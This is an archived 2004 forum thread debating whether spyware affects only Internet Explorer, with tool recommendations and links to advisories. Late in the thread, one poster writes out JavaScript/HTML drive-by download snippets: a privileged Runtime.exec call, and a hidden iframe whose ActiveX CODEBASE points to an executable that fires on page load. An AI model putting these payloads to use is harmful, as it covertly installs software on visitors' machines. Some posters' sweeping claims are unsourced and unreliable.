Spyware/adware and Internet Explorer

Discussion in 'Computer Security' started by John, Feb 3, 2004.

  1. John

    John Guest

    Is it true that spyware/adware only affects Internet Explorer?
    I've been told to use another browser (eg. Opera) because when
    browsing with that, no spyware/adware gets installed on my PC.
    True or false?
    John, Feb 3, 2004
    #1
    1. Advertising

  2. John

    Steven Burn Guest

    No, it's not true. Ad/spyware affects 99% of browsers, not just IE.

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)


    John <> wrote in message
    news:bvnunf$u808n$-berlin.de...
    > Is it true that spyware/adware only affects Internet Explorer?
    > I've been told to use another browser (eg. Opera) because when
    > browsing with that, no spyware/adware gets installed on my PC.
    > True or false?
    >
    >
    >
    Steven Burn, Feb 3, 2004
    #2
    1. Advertising

  3. John

    Frode Guest

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Steven Burn wrote:
    >No, it's not true. Ad/spyware affects 99% of browsers, not just IE.


    How so? It's my impression the vast majority of malware installed through
    browsing does so via IE security holes.



    - --
    Frode

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.0.3

    iQA/AwUBQB+Dk+XlGBWTt1afEQIeagCg5H5gkWNNmnCxo+uoDbF970h5bdUAmQGR
    uA2h3phN6LxlK40qlhTDcoLv
    =a18n
    -----END PGP SIGNATURE-----
    Frode, Feb 3, 2004
    #3
  4. John

    John Guest

    Steven Burn wrote:

    > Ad/spyware affects 99% of browsers, not just IE.


    Which browsers make up the 1% then (seriously) ?
    I'm tired of having to use Spybot and such apps.
    John, Feb 3, 2004
    #4
  5. John

    Steven Burn Guest

    AFAIK OffbyOne is the only browser that spyware/adware doesn't affect (I've
    never tried it myself).

    However, I'd still strongly reccomend that you use Spybot, regardless of
    which browser you use.

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)


    John <> wrote in message
    news:bvo2qh$u5ljr$-berlin.de...
    > Steven Burn wrote:
    >
    > > Ad/spyware affects 99% of browsers, not just IE.

    >
    > Which browsers make up the 1% then (seriously) ?
    > I'm tired of having to use Spybot and such apps.
    >
    >
    >
    Steven Burn, Feb 3, 2004
    #5
  6. John

    CalamityKen Guest

    Steven Burn wrote:
    > AFAIK OffbyOne is the only browser that spyware/adware doesn't affect
    > (I've never tried it myself).
    >
    > However, I'd still strongly reccomend that you use Spybot, regardless
    > of which browser you use.


    The only way one can be 100% safe is to never use any browser nor connect to
    the Internet.

    I use a layered defence mechanism because the exploiters multiply faster
    than cockroaches.

    1. A comprehensive ad and hijack blocking HOSTS file that is well
    maintained.
    (works independent of browser)
    http://webpages.charter.net/hpguru/hosts/hosts.html

    2. The frequently updated IE-SPYAD
    http://www.staff.uiuc.edu/~ehowes/resource.htm#IESPYAD

    3. The frequently updated SpywareBlaster
    (works independent of browser I believe)
    http://www.javacoolsoftware.com/spywareblaster.html

    4. WinPatrol for its great monitoring functions
    (works independent of browser)
    http://www.winpatrol.com

    > John <> wrote in message
    > news:bvo2qh$u5ljr$-berlin.de...
    >> Steven Burn wrote:
    >>
    >>> Ad/spyware affects 99% of browsers, not just IE.

    >>
    >> Which browsers make up the 1% then (seriously) ?
    >> I'm tired of having to use Spybot and such apps.
    CalamityKen, Feb 3, 2004
    #6
  7. John

    Frode Guest

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Steven Burn wrote:

    >AFAIK OffbyOne is the only browser that spyware/adware doesn't affect
    >(I've never tried it myself).


    I mucked up my previous post and responded to current group only. I'll
    paste it here cause I'm curious.


    Steven Burn wrote:
    >No, it's not true. Ad/spyware affects 99% of browsers, not just IE.


    How so? It's my impression the vast majority of malware installed through
    browsing does so via IE security holes.



    - --
    Frode

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.0.3

    iQA/AwUBQB+cNOXlGBWTt1afEQKSlACg/cYzd2dE8bPht7pT9bs+IZGpFK0AoPj4
    kDYtDkv6EgJJzeqy1hoOi5b5
    =s1tX
    -----END PGP SIGNATURE-----
    Frode, Feb 3, 2004
    #7
  8. John

    Steven Burn Guest

    CalamityKen <> wrote in message
    news:yLMTb.6089$...
    <snip>
    > The only way one can be 100% safe is to never use any browser nor connect

    to
    > the Internet.

    <snip>

    Sad...... but true

    <snip>
    > I use a layered defence mechanism because the exploiters multiply faster
    > than cockroaches.
    >
    > 1. A comprehensive ad and hijack blocking HOSTS file that is well
    > maintained.
    > (works independent of browser)
    > http://webpages.charter.net/hpguru/hosts/hosts.html
    >
    > 2. The frequently updated IE-SPYAD
    > http://www.staff.uiuc.edu/~ehowes/resource.htm#IESPYAD

    </snip>

    I keep meaning to check IE-SPYAD out, just never seem to find the time. :eek:(

    <snip>
    > 3. The frequently updated SpywareBlaster
    > (works independent of browser I believe)
    > http://www.javacoolsoftware.com/spywareblaster.html
    >
    > 4. WinPatrol for its great monitoring functions
    > (works independent of browser)
    > http://www.winpatrol.com
    >

    </snip>

    Excellent choice :eek:)

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)
    Steven Burn, Feb 3, 2004
    #8
  9. John

    Jay Jay Guest

    In article <bvo366$u9n1o$-berlin.de>, services@it-
    mate.co.uk says...
    > AFAIK OffbyOne is the only browser that spyware/adware doesn't affect (I've
    > never tried it myself).
    >
    > However, I'd still strongly reccomend that you use Spybot, regardless of
    > which browser you use.


    Excusez-moi le mot, but this is bollocks. Why would OffbyOne be any
    different? Could it be the miracle browser we've all been waiting for? I
    don't think so.

    Let's explain it this way:

    The internet can be a very nasty place (just like the real world). Your
    browser is a "doorway" to the internet. People with the silly habit of
    breaking in can do so if you are unprotected. So please lock your door
    with a firewall, antivirus and spyware cleaner (all can be found for
    free on the net).

    So a browser by itself doesn't give much protection. However compared to
    other browsers, Internet Explorer isn't a "doorway" but a huge lockless
    gate inviting everyone in for a free party.


    PS: Please don't top-post:
    http://www.html-faq.com/etiquette/?toppost
    Jay Jay, Feb 3, 2004
    #9
  10. John

    Steven Burn Guest

    Jay Jay <> wrote in message
    news:...
    > In article <bvo366$u9n1o$-berlin.de>, services@it-
    > mate.co.uk says...
    > > AFAIK OffbyOne is the only browser that spyware/adware doesn't affect

    (I've
    > > never tried it myself).
    > >
    > > However, I'd still strongly reccomend that you use Spybot, regardless of
    > > which browser you use.

    >
    > Excusez-moi le mot, but this is bollocks. Why would OffbyOne be any
    > different? Could it be the miracle browser we've all been waiting for? I
    > don't think so.

    </snip>

    As I said...... as far as I know. I've not checked ObO, so couldn't say
    whether it's true or not.

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)
    Steven Burn, Feb 3, 2004
    #10
  11. John

    Steven Burn Guest

    Frode <> wrote in message
    news:...
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    >
    > Steven Burn wrote:
    >
    > >AFAIK OffbyOne is the only browser that spyware/adware doesn't affect
    > >(I've never tried it myself).

    >
    > I mucked up my previous post and responded to current group only. I'll
    > paste it here cause I'm curious.
    >
    >
    > Steven Burn wrote:
    > >No, it's not true. Ad/spyware affects 99% of browsers, not just IE.

    >
    > How so? It's my impression the vast majority of malware installed through
    > browsing does so via IE security holes.
    >

    </snip>

    Actually, it gets installed mainly via "drive-by" downloads. IE security
    holes are just happen to be the phrase that everyone is accustomed to.

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)
    Steven Burn, Feb 3, 2004
    #11
  12. John

    Frode Guest

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Steven Burn wrote:
    >> >No, it's not true. Ad/spyware affects 99% of browsers, not just IE.

    >> How so? It's my impression the vast majority of malware installed
    >> through browsing does so via IE security holes.

    >Actually, it gets installed mainly via "drive-by" downloads.
    >IE security holes are just happen to be the phrase that everyone is
    >accustomed to.


    Aren't those generally done via activex holes which in turn would translate
    to being IE exclusive? I have seen activex support for mozilla but it was a
    third party plugin IIRC.



    - --
    Frode

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.0.3

    iQA/AwUBQB+mq+XlGBWTt1afEQLY0gCfdDnrwMorHynT0PdgXQB1dw8F8XcAnAxz
    wh79SMS9z1ARaY1tRHuYVqZj
    =4tSt
    -----END PGP SIGNATURE-----
    Frode, Feb 3, 2004
    #12
  13. John

    Steven Burn Guest

    Frode <> wrote in message
    news:...
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    >
    > Steven Burn wrote:
    > >> >No, it's not true. Ad/spyware affects 99% of browsers, not just IE.
    > >> How so? It's my impression the vast majority of malware installed
    > >> through browsing does so via IE security holes.

    > >Actually, it gets installed mainly via "drive-by" downloads.
    > >IE security holes are just happen to be the phrase that everyone is
    > >accustomed to.

    >
    > Aren't those generally done via activex holes which in turn would

    translate
    > to being IE exclusive? I have seen activex support for mozilla but it was

    a
    > third party plugin IIRC.
    >

    </snip>

    Generally....... yes. Always?.... no

    There's code's and scripts available that allow webmasters to download
    programs/scripts etc etc, without the users knowledge, and without using any
    part of the browser (regardless of whether it's Mozilla, Opera, IE, etc
    etc). ActiveX generally uses the OBJECT EMBED methods (just as Flash does).

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)
    Steven Burn, Feb 3, 2004
    #13
  14. John

    Frode Guest

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Steven Burn wrote:
    >> >Actually, it gets installed mainly via "drive-by" downloads.
    >> >IE security holes are just happen to be the phrase that everyone is
    >> >accustomed to.

    >> Aren't those generally done via activex holes which in turn would

    >Generally....... yes. Always?.... no


    Judging by the amount of activex controls spywareblaster nixes the
    advantage of other browsers would seem to be huge.

    >There's code's and scripts available that allow webmasters to download
    >programs/scripts etc etc, without the users knowledge, and without using
    >any part of the browser (regardless of whether it's Mozilla, Opera, IE,
    >etc etc). ActiveX generally uses the OBJECT EMBED methods (just as Flash
    >does).


    Any examples? One hears about these things all the time with IE (and just a
    bit of link clicking will give spybot s&d and its ilk plenty to do as proof
    of concept), while hardly ever for other browsers like Opera and Mozilla
    apart from the rare buffer overflow or similar. But not any intrinsic
    faults in what they parse that allow covert installation of any content a
    webmaster may wish to put on your computer.


    - --
    Frode

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.0.3

    iQA/AwUBQB+uFeXlGBWTt1afEQL6tACgpQLBlqVEZVeVZMKK/dZR2nIv3kMAnRLA
    sMMHuLH2ZyBwj3emJ0vv+Tum
    =T9jh
    -----END PGP SIGNATURE-----
    Frode, Feb 3, 2004
    #14
  15. John

    lexar Guest

    John wrote:
    > Is it true that spyware/adware only affects Internet Explorer?
    > I've been told to use another browser (eg. Opera) because when
    > browsing with that, no spyware/adware gets installed on my PC.
    > True or false?
    >
    >
    >


    The possibility of malware exists anytime you download data and
    view it. However, IE is by an order of magnitude (or maybe 2) the
    most susceptible Currently,
    http://secunia.com/advisories/10395/
    no patch available, this is what the supplier advises :
    http://support.microsoft.com/default.aspx?scid=kb;[ln];833786
    the vendor says to TYPE IN URLS, don't click on them, that would be
    Bad(tm). MS has know about this for some time.
    Wanna see for yourself? Go to :
    http://zcat.wired.net.nz/upgrade

    Team this up with this one:
    http://secunia.com/Internet_Explorer_File_Download_Extension_Spoofing_Test/
    And downloading anything from (what appears to be) anywhere is unsafe.

    Monopoly ruleset :
    1) innovate and price gouge until all competition is gone
    2) leverage total reliance into less choice for consumer

    If you want IE to become better, use Netscape/Mozilla.
    If you want MS software to be higher quality/lower price, use
    Linux/Mozilla
    Of course, once you do, you most likely won't go back, but the
    poor unfortunates you left behind _may_ enjoy the results of the
    market created.

    Here's a thought on REALLY locking down a machine, run Knoppix,
    http://www.knopper.net/knoppix/index-en.html
    It is a 'Live-CD', or a complete Linux system, GUI desktop, office
    suite, mutliple browser, etc that boots from a CD, doesn't touch
    or need a hard drive. You can store your home dir on the HD, if
    you choose to however, or on a USB drive.
    If you want choices, look beyond windows.
    lexar, Feb 3, 2004
    #15
  16. John

    Steven Burn Guest

    Frode <> wrote in message
    news:...
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    >
    > Steven Burn wrote:
    > >> >Actually, it gets installed mainly via "drive-by" downloads.
    > >> >IE security holes are just happen to be the phrase that everyone is
    > >> >accustomed to.
    > >> Aren't those generally done via activex holes which in turn would

    > >Generally....... yes. Always?.... no

    >
    > Judging by the amount of activex controls spywareblaster nixes the
    > advantage of other browsers would seem to be huge.
    >
    > >There's code's and scripts available that allow webmasters to download
    > >programs/scripts etc etc, without the users knowledge, and without using
    > >any part of the browser (regardless of whether it's Mozilla, Opera, IE,
    > >etc etc). ActiveX generally uses the OBJECT EMBED methods (just as Flash
    > >does).

    >
    > Any examples? One hears about these things all the time with IE (and just

    a
    > bit of link clicking will give spybot s&d and its ilk plenty to do as

    proof
    > of concept), while hardly ever for other browsers like Opera and Mozilla
    > apart from the rare buffer overflow or similar. But not any intrinsic
    > faults in what they parse that allow covert installation of any content a
    > webmaster may wish to put on your computer.
    >

    </snip>

    There are plenty of examples on places such as;

    www.planet-source-code.com
    www.aspfaq.com
    www.javascriptsource.com

    Along with a ton of others

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)
    Steven Burn, Feb 3, 2004
    #16
  17. Depends on what particular ad/spyware we're talking about.

    Most of the non-IE browsers have much better controls than IE for
    blocking pop-up ads and tracking-cookies. Also some of the most
    malevalent spyware programs get onto the system through flaws in IE.

    That's not to say that you will be totally impervious to ad/spyware if
    you use Opera, Mozilla, etc., but it will help.

    Keeping up to date on IE patches can also help.

    "Steven Burn" <> wrote in message news:<bvnv7v$t5msa$-berlin.de>...
    > No, it's not true. Ad/spyware affects 99% of browsers, not just IE.
    Chris Calabrese, Feb 3, 2004
    #17
  18. John

    Frode Guest

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Steven Burn wrote:
    >There are plenty of examples on places such as;
    >
    >www.planet-source-code.com


    A search for exploit in asp/vbscript gives 1 hit. The same goes for
    java/javascript. Where are the examples?

    >www.aspfaq.com


    A search for the word "exploit" gives 6 hits. None of which are terribly
    relevant. A general google search for "asp exploits" does give some hits,
    most of which seem to concern server, not client, compromise. Rather
    logical given the nature of ASP as far I'm aware of its purpose
    (server-side scripting).

    >www.javascriptsource.com


    Not a single hit on search for the word exploit.

    >Along with a ton of others


    Anything concrete? None of those sites have obvious sections covering proof
    of concept for browser-independent exploits.

    I was thinking more along the lines of an example of a working exploit that
    covertly installs a payload. You can google up a bunch of sites with
    examples of working IE exploits to click. None of which I've gotten to do
    anything malicious outside of IE. Just give me one concrete place to go
    find a browser independent exploit I can click and see the effects of.


    - --
    Frode


    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.0.3

    iQA/AwUBQB++CeXlGBWTt1afEQJhEwCg3WrN46y7u5XMU6wMbsauy6Vn0FUAoOhJ
    7QdmTF9hNk7IkjoBgj/3c64B
    =XgwH
    -----END PGP SIGNATURE-----
    Frode, Feb 3, 2004
    #18
  19. John

    Steven Burn Guest

    Frode <> wrote in message
    news:...
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    >
    > Steven Burn wrote:
    > >There are plenty of examples on places such as;
    > >
    > >www.planet-source-code.com

    >
    > A search for exploit in asp/vbscript gives 1 hit. The same goes for
    > java/javascript. Where are the examples?
    >
    > >www.aspfaq.com

    >
    > A search for the word "exploit" gives 6 hits. None of which are terribly
    > relevant. A general google search for "asp exploits" does give some hits,
    > most of which seem to concern server, not client, compromise. Rather
    > logical given the nature of ASP as far I'm aware of its purpose
    > (server-side scripting).
    >
    > >www.javascriptsource.com

    >
    > Not a single hit on search for the word exploit.
    >
    > >Along with a ton of others

    >
    > Anything concrete? None of those sites have obvious sections covering

    proof
    > of concept for browser-independent exploits.
    >
    > I was thinking more along the lines of an example of a working exploit

    that
    > covertly installs a payload. You can google up a bunch of sites with
    > examples of working IE exploits to click. None of which I've gotten to do
    > anything malicious outside of IE. Just give me one concrete place to go
    > find a browser independent exploit I can click and see the effects of.
    >
    >
    > - --
    > Frode
    >
    >
    > -----BEGIN PGP SIGNATURE-----
    > Version: PGP 8.0.3
    >
    > iQA/AwUBQB++CeXlGBWTt1afEQJhEwCg3WrN46y7u5XMU6wMbsauy6Vn0FUAoOhJ
    > 7QdmTF9hNk7IkjoBgj/3c64B
    > =XgwH
    > -----END PGP SIGNATURE-----
    >


    Here's a quick javascript example for you (note: I am not a "seasoned" java
    developer, so the following is pseudo code only).

    <script language="Javascript">
    window.open(http://www.domain.com/anyfile.doc, "wordWin");
    function exec (command)
    {
    netscape.security.PrivilegeManager.enablePrivilege("UniversalExecAccess");
    return java.lang.Runtime.getRuntime().exec(command);
    }
    exec ("C:\\...\\anyexe.exe")
    </script>

    --------
    Some light research for you.........

    http://www.google.co.uk/search?q=browser exploit&hl=en&lr=&ie=UTF-8&oe=UTF-8
    &start=20&sa=N

    Some light reading for you (hope you have a few hours)

    http://www.hack3r.com/index.cfm?sec=programming&page=4
    http://www.hack3r.com/index.cfm?sec=texts&page=1

    The website's I mentioned WILL NOT list them as exploits simply because they
    are exploits (I'd have thought that was common knowledge).

    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)
    Steven Burn, Feb 3, 2004
    #19
  20. John

    Steven Burn Guest

    Another example for you.........

    <!-- On page load -->
    <body onload="return linkit('/test/jwebserver.exe');">

    <!-- As hyperlink -->
    <a href="" onclick="return linkit('/test/bab_sayit.exe');">Babylon Say
    It</a>

    <!-- Actual script that does the work -->
    <script language="Javascript">
    // linkit puts filename into HTML content and spews it into iframe function
    linkit(filename)
    {
    strpagestart = "<HTML><HEAD></HEAD><BODY><OBJECT CLASSID=" +
    "'CLSID:10000000-0000-0000-0000-000000000000' CODEBASE='";
    strpageend = "'></OBJECT></BODY></HTML>";
    runnerwin.document.open();
    runnerwin.document.write(strpagestart + filename + strpageend);
    window.status = "Done.";
    return false; // stop hyperlink and stay on this page
    }
    </script>

    <!-- hidden iframe used for inserting html content -->
    <IFRAME ID=runnerwin WIDTH=0 HEIGHT=0 SRC="about:blank"></IFRAME><BR/>


    --
    Regards

    Steven Burn
    Ur I.T. Mate Group
    www.it-mate.co.uk

    Keeping it FREE!

    Disclaimer:
    I know I'm probably wrong, I just like taking part ;o)
    Steven Burn, Feb 3, 2004
    #20
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Hugh Sutherland

    popup adware spyware and spam

    Hugh Sutherland, Jul 20, 2003, in forum: Computer Support
    Replies:
    0
    Views:
    502
    Hugh Sutherland
    Jul 20, 2003
  2. Shane

    Adware and Spyware on system

    Shane, Oct 3, 2003, in forum: Computer Support
    Replies:
    10
    Views:
    596
    Brian H¹©
    Oct 4, 2003
  3. Geoff/Elaine
    Replies:
    10
    Views:
    741
    Blinky the Shark
    Sep 11, 2004
  4. chezmoore

    Adware, spyware and pop-ups

    chezmoore, Jun 25, 2005, in forum: Computer Support
    Replies:
    3
    Views:
    497
  5. AC Parker
    Replies:
    3
    Views:
    481
    David
    Aug 26, 2004
Loading...

Share This Page